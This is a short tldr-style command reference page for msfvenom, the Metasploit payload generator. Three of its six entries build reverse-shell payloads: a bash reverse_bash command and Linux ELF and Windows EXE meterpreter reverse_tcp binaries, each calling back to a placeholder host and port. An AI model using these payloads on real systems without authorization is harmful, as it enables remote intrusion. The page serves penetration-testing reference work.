
msfvenom
List of commands for msfvenom:
-
msfvenom:tldr:04531 msfvenom: List formats.$ msfvenom -l formatstry on your machineexplain this command
-
msfvenom:tldr:08cd6 msfvenom: Create a raw bash with a reverse TCP handler.$ msfvenom -p cmd/unix/reverse_bash LHOST=${local_ip} LPORT=${local_port} -f rawtry on your machineexplain this command
-
msfvenom:tldr:2d48c msfvenom: Show payload options.$ msfvenom -p ${payload} --list-optionstry on your machineexplain this command
-
msfvenom:tldr:6a63d msfvenom: Create an ELF binary with a reverse TCP handler.$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=${local_ip} LPORT=${local_port} -f elf -o ${path-to-binary}try on your machineexplain this command
-
msfvenom:tldr:cdff3 msfvenom: List payloads.$ msfvenom -l payloadstry on your machineexplain this command
-
msfvenom:tldr:ec896 msfvenom: Create an EXE binary with a reverse TCP handler.$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=${local_ip} LPORT=${local_port} -f exe -o ${path-to-binary-exe}try on your machineexplain this command